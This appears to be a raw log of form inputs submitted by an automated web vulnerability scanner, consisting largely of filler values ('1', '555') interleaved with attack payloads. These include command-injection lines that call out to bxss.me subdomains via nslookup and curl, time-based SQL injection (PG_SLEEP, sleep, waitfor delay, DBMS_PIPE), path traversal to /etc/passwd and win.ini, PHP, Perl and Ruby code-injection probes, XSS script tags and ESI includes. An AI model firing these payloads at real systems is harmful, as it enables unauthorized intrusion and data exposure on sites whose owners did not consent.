(nslookup -q=cname hitbdoypubhzl7a37b.bxss.me||curl hitbdoypubhzl7a37b.bxss.me))
1
555
1
555h36kOpSG' OR 837=(SELECT 837 FROM PG_SLEEP(15))--
1
555
/etc/shells
555
'+'A'.concat(70-3).concat(22*4).concat(119).concat(66).concat(108).concat(77)+(require'socket' Socket.gethostbyname('hitkb'+'rliasama1ffae.bxss.me.')[3].to_s)+&
555
1
bxss.me/t/xss.html?%00
1
555
'.print(md5(31337)).'
555
1
'.gethostbyname(lc('hitlk'.'ukonbcuoae7b9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(84).chr(116).chr(89).'
1
555
1
555
'A'.concat(70-3).concat(22*4).concat(106).concat(76).concat(103).concat(86)+(require'socket' Socket.gethostbyname('hitvz'+'nozqvltx5e4d6.bxss.me.')[3].to_s)
$(nslookup -q=cname hitcnlqnaqlbl08814.bxss.me||curl hitcnlqnaqlbl08814.bxss.me)
1
555
../../../../../../../../../../../../../../etc/shells
555
1
".gethostbyname(lc("hitqj"."vfkaeefr5319e.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(87).chr(119).chr(71)."
1
555
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
"+"A".concat(70-3).concat(22*4).concat(115).concat(67).concat(120).concat(83)+(require"socket" Socket.gethostbyname("hitrk"+"nqtvolrw9938f.bxss.me.")[3].to_s)+"
1
555
1
555
c:/windows/win.ini
555
1
gethostbyname(lc('hitcy'.'uydunmkn67af3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(79).chr(102).chr(80)
1
555
1*if(now()=sysdate(),sleep(15),0)
555
1
555
1
&nslookup -q=cname hityslziugjhy397a6.bxss.me&'\"`0&nslookup -q=cname hityslziugjhy397a6.bxss.me&`'
1
555
bxss.me
555
1
555
1
555
1
555
1
';print(md5(31337));$a='
1
'+'A'.concat(70-3).concat(22*4).concat(116).concat(75).concat(100).concat(85)+(require'socket' Socket.gethostbyname('hitna'+'savrvvqraf3ef.bxss.me.')[3].to_s)+'
1
555
1
555
1
555
Http://bxss.me/t/fit.txt
555
1
555
1
&(nslookup -q=cname hitkbjbnsbofe6d1a9.bxss.me||curl hitkbjbnsbofe6d1a9.bxss.me)&'\"`0&(nslookup -q=cname hitkbjbnsbofe6d1a9.bxss.me||curl hitkbjbnsbofe6d1a9.bxss.me)&`'
1
555
http://bxss.me/t/fit.txt?.jpg
555
1
555
1
'A'.concat(70-3).concat(22*4).concat(121).concat(74).concat(117).concat(67)+(require'socket' Socket.gethostbyname('hittn'+'gsskvzhafb0d2.bxss.me.')[3].to_s)
1
";print(md5(31337));$a="
1
555
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1
555
1
555
1
${@print(md5(31337))}
1
|(nslookup -q=cname hitivexfvlhcs56cd6.bxss.me||curl hitivexfvlhcs56cd6.bxss.me)
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1
555
1
555
1
555
1
555iwmCeLOB') OR 423=(SELECT 423 FROM PG_SLEEP(15))--
1
555
1
${@print(md5(31337))}\
1
/etc/shells
1
`(nslookup -q=cname hitunlfqshelvad048.bxss.me||curl hitunlfqshelvad048.bxss.me)`
1
555
1
555
1
555
1
555
1
../../../../../../../../../../../../../../etc/shells
1
555
1
555
1
'.print(md5(31337)).'
1
555
1
555
1
c:/windows/win.ini
1
;(nslookup -q=cname hitogiywisswy6a40f.bxss.me||curl hitogiywisswy6a40f.bxss.me)|(nslookup -q=cname hitogiywisswy6a40f.bxss.me||curl hitogiywisswy6a40f.bxss.me)&(nslookup -q=cname hitogiywisswy6a40f.bxss.me||curl hitogiywisswy6a40f.bxss.me)
1
555
1
555
1
555
1
555
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
555
1
555
1
555
1
555
1
bxss.me
1
555
1
555
1
|(nslookup${IFS}-q${IFS}cname${IFS}hitbwcrcsbcztd8c78.bxss.me||curl${IFS}hitbwcrcsbcztd8c78.bxss.me)
1
555
1
555
1
555
1
555
1
555
1
Http://bxss.me/t/fit.txt
1
&(nslookup${IFS}-q${IFS}cname${IFS}hithtthunjarya8524.bxss.me||curl${IFS}hithtthunjarya8524.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hithtthunjarya8524.bxss.me||curl${IFS}hithtthunjarya8524.bxss.me)&`'
1
555
1
555
1
555
1
555
1
555
depoimentos
555
1
555
1
555
1
555
1
http://bxss.me/t/fit.txt?.jpg
1
555
1
555
depoimentos
555
1
555
1
555
1
555
1
555
1
555
1
555
depoimentos/.
555ufj7kZ5a')) OR 670=(SELECT 670 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
555
1
555
1
depoimentos
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
depoimentos
1
555
1
555
1
555
1
555
1
555
1
555
1
555
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
depoimentos/.
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
1
555
1
555
1
555
redirtest.acx
555
1
555
1
555
1
555
1
555
1
redirtest.acx
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
555
1
555
1
555
1
555
1
555'"
1
555
1
555
1
555
1
555
1
555
1
555????%2527%2522\'\"
1
555
1
555
1
555
1-1; waitfor delay '0:0:15' --
555
1
555
1
@@ESIz8
1
555
1
555
1
555
1
555
1
555
1
(select 198766*667891)
1
555
1
555
1
555
1
555
1
555
1
555
1&n950923=v915660
555
1
555
1
555&n930101=v923767
1
555
1
555
1
555
)
555
1
(select 198766*667891 from DUAL)
1
555
1
555
1
555
555
1
555
1
555
1
555
!(()&&!|*|*|
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1); waitfor delay '0:0:15' --
555
1
555
1
555
^(#$!@#$)(()))******
555
1
555
555
1
)
1
555
1
555
1
555
1
555
!(()&&!|*|*|
1
555
1
555
1
555
1
555
1
555
555
1
555
1
^(#$!@#$)(()))******
1
555
1
555
1
555
555
1
555
1
555
1
555
1
555
'"()
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1'&&sleep(27*1000)*igtwee&&'
555
1
555
1
555
1
555
1
555
1"&&sleep(27*1000)*cndvca&&"
555
1
555
1
555
1
555
1
555
1
555
1-1 waitfor delay '0:0:15' --
555
1
555
1'||sleep(27*1000)*iiewqn||'
555
1
555
1
555
1
555
1
555
1"||sleep(27*1000)*btngnr||"
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
'"()
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555'&&sleep(27*1000)*yrkyiu&&'
1
555
1
555
1
555
1
555"&&sleep(27*1000)*qiomvc&&"
1
555
1
555
1
555
1
555
1Qw5UVLtn'; waitfor delay '0:0:15' --
555'||sleep(27*1000)*kstgmz||'
1
555
1
555
1
555
1
555
1
555
1
555"||sleep(27*1000)*tmrhqf||"
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1 OR 37=(SELECT 37 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1) OR 748=(SELECT 748 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1)) OR 108=(SELECT 108 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1M25Ev37j' OR 812=(SELECT 812 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1E0mDHzup') OR 866=(SELECT 866 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1CLCBCrwx')) OR 703=(SELECT 703 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1'"
555
1????%2527%2522\'\"
555
1
555
1
555
@@lE7FL
555
1
555
1
555
(select 198766*667891)
555
1
555
1
555
(select 198766*667891 from DUAL)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
5559Br5oVhB
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
-1 OR 5*5=25 --
1
555
1
-1 OR 5*5=25
1
555
1
-1' OR 5*5=25 --
1
555
1
555
1
555
1
-1" OR 5*5=25 --
1
555
1
-1' OR 5*5=25 or 'FhiEfmaw'='
1
555
1
555
1
555
1
-1" OR 5*5=25 or "04cyAnX7"="
1
555
1
555
1
555
1
555
1
555
1
555
1
555*if(now()=sysdate(),sleep(15),0)
1
555
1
555
1
555
1
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
1
555
1
555
1
555
1
555
1
555
1
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
1
555
1
555
1
555
1
555
1
555
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555-1; waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555-1); waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555-1 waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555
1
555HUaVUR4d'; waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555-1 OR 721=(SELECT 721 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
555
1
555
1
555-1) OR 821=(SELECT 821 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
555-1)) OR 299=(SELECT 299 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555eURKi184' OR 47=(SELECT 47 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555d0KiqCsC') OR 645=(SELECT 645 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555LcTMii6m')) OR 590=(SELECT 590 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
555
1
555
1
555
1
555
1
555
1
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
555
1
555
1
555
1
555
1
555'"
1
555
1
555????%2527%2522\'\"
1
@@6KyWG
1
555
1
(select 198766*667891)
1
555
1
555
1
(select 198766*667891 from DUAL)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
555
1
555
1
555
1
555
1
555
1
555
1
555
xfs.bxss.me
xfs.bxss.me
1
555
1
555
1
555
1
555
1
555
1
555
1
555
'"
555
<!--
'"
1
<!--
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1'"()&%<zzz><ScRiPt >nNuL(9983)</ScRiPt>
555
'"()&%<zzz><ScRiPt >nNuL(9442)</ScRiPt>
555
19223948
555'"()&%<zzz><ScRiPt >nNuL(9377)</ScRiPt>
1
'"()&%<zzz><ScRiPt >nNuL(9746)</ScRiPt>
1
5559799542
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
555
12345'"\'\");|]*{ <>?''????
555
555
1
12345'"\'\");|]*{ <>?''????
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
response.write(9221225*9617196)
555
1
555
1
555
'+response.write(9221225*9617196)+'
555
1
555
1
555
"+response.write(9221225*9617196)+"
555
1
response.write(9741109*9803986)
1
'+response.write(9741109*9803986)+'
1
555
1
555
1
"+response.write(9741109*9803986)+"
1
555
1
555
1
555
1
555
1
555
15zwOXqcX
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
echo wnjlkt$()\ rpnizy\nz^xyu||a #' &echo wnjlkt$()\ rpnizy\nz^xyu||a #|" &echo wnjlkt$()\ rpnizy\nz^xyu||a #
555
1
555
-1 OR 5*5=25 --
555
&echo znrbsp$()\ idezfe\nz^xyu||a #' &echo znrbsp$()\ idezfe\nz^xyu||a #|" &echo znrbsp$()\ idezfe\nz^xyu||a #
555
-1 OR 5*5=25
555
1
555
1&echo exkjfq$()\ sbnjsf\nz^xyu||a #' &echo exkjfq$()\ sbnjsf\nz^xyu||a #|" &echo exkjfq$()\ sbnjsf\nz^xyu||a #
555
1
555
1
555
-1' OR 5*5=25 --
555
|echo lqhzie$()\ oyhhyh\nz^xyu||a #' |echo lqhzie$()\ oyhhyh\nz^xyu||a #|" |echo lqhzie$()\ oyhhyh\nz^xyu||a #
555
1
555
1|echo ecfray$()\ fikvcl\nz^xyu||a #' |echo ecfray$()\ fikvcl\nz^xyu||a #|" |echo ecfray$()\ fikvcl\nz^xyu||a #
555
-1" OR 5*5=25 --
555
1
555
expr 9000530526 - 948512
555
-1' OR 5*5=25 or 'TN1mItZ4'='
555
1
555
(nslookup -q=cname hithgiwfgmmxuf9cee.bxss.me||curl hithgiwfgmmxuf9cee.bxss.me))
555
-1" OR 5*5=25 or "nBtRu3KT"="
555
5jBQNiHX
555
1
555
jXeGsLde: A0neN8ke
555
$(nslookup -q=cname hitwvttfwlszgd1357.bxss.me||curl hitwvttfwlszgd1357.bxss.me)
3Plr1MT3
1
555
&nslookup -q=cname hitqphhhhjcxt86908.bxss.me&'\"`0&nslookup -q=cname hitqphhhhjcxt86908.bxss.me&`'
ARw0OMm6: 38tfgLS0
1
555
&(nslookup -q=cname hitpggmceborab139c.bxss.me||curl hitpggmceborab139c.bxss.me)&'\"`0&(nslookup -q=cname hitpggmceborab139c.bxss.me||curl hitpggmceborab139c.bxss.me)&`'
555
1
555
1
555
1
555
|(nslookup -q=cname hitiifcjtqcgw18cb7.bxss.me||curl hitiifcjtqcgw18cb7.bxss.me)
555
1
555
1
555
`(nslookup -q=cname hitfwuebpbtox83753.bxss.me||curl hitfwuebpbtox83753.bxss.me)`
555
1
555
;(nslookup -q=cname hitbsbdwqnzkr029a8.bxss.me||curl hitbsbdwqnzkr029a8.bxss.me)|(nslookup -q=cname hitbsbdwqnzkr029a8.bxss.me||curl hitbsbdwqnzkr029a8.bxss.me)&(nslookup -q=cname hitbsbdwqnzkr029
555
1
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitznnsyuycgv8955f.bxss.me||curl${IFS}hitznnsyuycgv8955f.bxss.me)
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitwilqmdrbize36f6.bxss.me||curl${IFS}hitwilqmdrbize36f6.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitwilqmdrbize36f6.bxss.me||curl${IFS}h
555
1*if(now()=sysdate(),sleep(15),0)
555
1
echo eqskzg$()\ vagrrf\nz^xyu||a #' &echo eqskzg$()\ vagrrf\nz^xyu||a #|" &echo eqskzg$()\ vagrrf\nz^xyu||a #
1
555
1
&echo btwlev$()\ twzanc\nz^xyu||a #' &echo btwlev$()\ twzanc\nz^xyu||a #|" &echo btwlev$()\ twzanc\nz^xyu||a #
1
555
1
555&echo ufojgg$()\ urjkpn\nz^xyu||a #' &echo ufojgg$()\ urjkpn\nz^xyu||a #|" &echo ufojgg$()\ urjkpn\nz^xyu||a #
1
555
1
|echo ucemvr$()\ fpdota\nz^xyu||a #' |echo ucemvr$()\ fpdota\nz^xyu||a #|" |echo ucemvr$()\ fpdota\nz^xyu||a #
1
555
1
555
1
555|echo mlfivi$()\ uvrvwd\nz^xyu||a #' |echo mlfivi$()\ uvrvwd\nz^xyu||a #|" |echo mlfivi$()\ uvrvwd\nz^xyu||a #
1
555
1
555
1
expr 9000831717 - 929737
1
555
1
(nslookup -q=cname hituzxyanarppc7317.bxss.me||curl hituzxyanarppc7317.bxss.me))
1
555
../../../../../../../../../../../../../../etc/passwd
$(nslookup -q=cname hitwnosnlcxyleffe8.bxss.me||curl hitwnosnlcxyleffe8.bxss.me)
1
&nslookup -q=cname hitnryurqeoxw741c0.bxss.me&'\"`0&nslookup -q=cname hitnryurqeoxw741c0.bxss.me&`'
1
555
1
555
../../../../../../../../../../../../../../windows/win.ini
&(nslookup -q=cname hitazpjtnwmcoeea85.bxss.me||curl hitazpjtnwmcoeea85.bxss.me)&'\"`0&(nslookup -q=cname hitazpjtnwmcoeea85.bxss.me||curl hitazpjtnwmcoeea85.bxss.me)&`'
1
555
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
555
file:///etc/passwd
|(nslookup -q=cname hitogsircxkfi59cc0.bxss.me||curl hitogsircxkfi59cc0.bxss.me)
1
555
1
555
1
`(nslookup -q=cname hitdoquzzoqrdc3929.bxss.me||curl hitdoquzzoqrdc3929.bxss.me)`
1
555
../1
;(nslookup -q=cname hitzlulmqapix69da3.bxss.me||curl hitzlulmqapix69da3.bxss.me)|(nslookup -q=cname hitzlulmqapix69da3.bxss.me||curl hitzlulmqapix69da3.bxss.me)&(nslookup -q=cname hitzlulmqapix69da3.bxss.me||curl hitzlulmqapix69da3.bxss.me)
1
555
1
../../../../../../../../../../../../../../etc/passwd
1
555
1
|(nslookup${IFS}-q${IFS}cname${IFS}hitwnnwodfquoab421.bxss.me||curl${IFS}hitwnnwodfquoab421.bxss.me)
1
555
1
../../../../../../../../../../../../../../windows/win.ini
1
555
1
555
1
file:///etc/passwd
1
&(nslookup${IFS}-q${IFS}cname${IFS}hitaelicjsymacff09.bxss.me||curl${IFS}hitaelicjsymacff09.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitaelicjsymacff09.bxss.me||curl${IFS}hitaelicjsymacff09.bxss.me)&`'
1
555
1
555
1
555
1
555
1
555
1
555
1
../555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1<esi:include src="http://bxss.me/rpb.png"/>
555
1-1; waitfor delay '0:0:15' --
555<esi:include src="http://bxss.me/rpb.png"/>
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
${10000322+9999236}
555
1
${9999436+10000362}
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1); waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
1
555
';print(md5(31337));$a='
555
";print(md5(31337));$a="
555
1
555
1
555
${@print(md5(31337))}
555
1
555
1
555
${@print(md5(31337))}\
555
1
555
1
555
1
555
'.print(md5(31337)).'
555
1
555
1
555
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
555
1
';print(md5(31337));$a='
1
555
1
555
1
";print(md5(31337));$a="
1
555
1
555
1
555
1
${@print(md5(31337))}
1
555
1
555
1
${@print(md5(31337))}\
1
555
1
555
1
'.print(md5(31337)).'
1
555
1
555
1-1 waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
118kJpuZq'; waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
'.gethostbyname(lc('hitjg'.'rafhewgt662e0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(86).chr(99).chr(71).'
555
1
555
1
555
1
555
1
555
1
555
".gethostbyname(lc("hitej"."okrakyix610ab.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(78).chr(122).chr(70)."
555
1
555
1
555
1
555
1
555
gethostbyname(lc('hitzm'.'djkhcspsc3aef.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(74).chr(97).chr(83)
555
1
'.gethostbyname(lc('hitwg'.'qlelelcx46035.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(85).chr(102).chr(88).'
1
555
1
555
1
".gethostbyname(lc("hitxm"."imwnadzr775b8.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(87).chr(107).chr(77)."
1
555
1
gethostbyname(lc('hitmq'.'knqgtmmi7def0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(79).chr(117).chr(78)
1
555
1
555
1
555
1
555
1
555
1
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
1
555
1
555
1
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
1
555
1
555
1
555
1
555
/etc/shells
555
1
555
1
555
1
555
1
555
1
555
../../../../../../../../../../../../../../etc/shells
555
1
555
1-1 OR 801=(SELECT 801 FROM PG_SLEEP(15))--
555
c:/windows/win.ini
555
1
555
1
555
1
555
1
555
bxss.me
555
1
555
Http://bxss.me/t/fit.txt
555
1
555
http://bxss.me/t/fit.txt?.jpg
555
1
555
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1
555
1
555
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1
555
1
555
1
555
1
/etc/shells
1
555
1
555
1
../../../../../../../../../../../../../../etc/shells
1
555
HttP://bxss.me/t/xss.html?%00
c:/windows/win.ini
1
555
1
555
1
555
bxss.me/t/xss.html?%00
bxss.me
1
555
"+"A".concat(70-3).concat(22*4).concat(109).concat(84).concat(117).concat(73)+(require"socket" Socket.gethostbyname("hitqx"+"uomedsnt42dc8.bxss.me.")[3].to_s)+&
HttP://bxss.me/t/xss.html?%00
1
555
'+'A'.concat(70-3).concat(22*4).concat(112).concat(74).concat(121).concat(70)+(require'socket' Socket.gethostbyname('hitii'+'stunrxuyb0ea3.bxss.me.')[3].to_s)+&
555
1
Http://bxss.me/t/fit.txt
1
bxss.me/t/xss.html?%00
1
555
1-1) OR 226=(SELECT 226 FROM PG_SLEEP(15))--
555
'A'.concat(70-3).concat(22*4).concat(111).concat(71).concat(102).concat(87)+(require'socket' Socket.gethostbyname('hitrl'+'aixbvkfie8b65.bxss.me.')[3].to_s)
http://bxss.me/t/fit.txt?.jpg
1
555
1
"+"A".concat(70-3).concat(22*4).concat(103).concat(78).concat(106).concat(86)+(require"socket" Socket.gethostbyname("hitie"+"pjvkixra28980.bxss.me.")[3].to_s)+"
1
555
1
555
1
555
1
555
1
555
1
555
1
'+'A'.concat(70-3).concat(22*4).concat(102).concat(77).concat(115).concat(87)+(require'socket' Socket.gethostbyname('hitka'+'bluqjqkuaf909.bxss.me.')[3].to_s)+'
1
555
1
'A'.concat(70-3).concat(22*4).concat(100).concat(66).concat(119).concat(79)+(require'socket' Socket.gethostbyname('hitkk'+'mtwjabyjfff09.bxss.me.')[3].to_s)
1
555
1
555
depoimentos
555
1
555
1
555
depoimentos
555
1
555
1
555
1
555
1
555
depoimentos/.
555
1
555
1
depoimentos
1
555
1
555
1
depoimentos
1
555
1
555
1
555
1
555
1-1)) OR 995=(SELECT 995 FROM PG_SLEEP(15))--
555
1
555
1
555
1
depoimentos/.
1
555
1
555
1
555
1
555
1
555
1
555
1
555
redirtest.acx
555
1
redirtest.acx
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1WIACXw8R' OR 407=(SELECT 407 FROM PG_SLEEP(15))--
555
1
555
1
555
1&n902068=v987060
555
1
555
1
555
1
555
1
555&n914074=v993865
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
)
555
1
555
1
555
1
555
1
555
1
555
!(()&&!|*|*|
555
1
555
1
555
1
555
^(#$!@#$)(()))******
555
1
)
1
555
1
555
1
555
1
!(()&&!|*|*|
1
555
1
555
1
555
1
555
^(#$!@#$)(()))******
1
555
1
555
1
555
1
555
1
555
1
555
1
555
555
1
555
1
555
14CvBUG3b') OR 333=(SELECT 333 FROM PG_SLEEP(15))--
555
1
555
555
1
555
1
555
1
555
1
555
1
555
1
555
'"()
555
1
555
1
555
1'&&sleep(27*1000)*bpzagi&&'
555
1
555
1
555
1"&&sleep(27*1000)*gcjvef&&"
555
1
555
1
555
1'||sleep(27*1000)*rslgwo||'
555
1
555
1"||sleep(27*1000)*glveeg||"
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
19h3mLDpx')) OR 804=(SELECT 804 FROM PG_SLEEP(15))--
555
1
555
1
'"()
1
555
1
555'&&sleep(27*1000)*zknlyw&&'
1
555
1
555
1
555
1
555"&&sleep(27*1000)*piwwlq&&"
1
555'||sleep(27*1000)*tmnzwv||'
1
555
1
555"||sleep(27*1000)*ubxuzm||"
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1
555
1
555
1
555
1'"
555
1
555
1????%2527%2522\'\"
555
1
555
@@Gsimi
555
1
555
(select 198766*667891)
555
1
555
1
555
(select 198766*667891 from DUAL)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555gPJg8Kgl
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
-1 OR 5*5=25 --
1
555
1
555
1
-1 OR 5*5=25
1
555
1
555
1
-1' OR 5*5=25 --
1
555
1
-1" OR 5*5=25 --
1
555
1
555
1
-1' OR 5*5=25 or 'm1rJa1pS'='
1
555
1
555
1
-1" OR 5*5=25 or "400VU7Kb"="
1
555
1
555
1
555
1
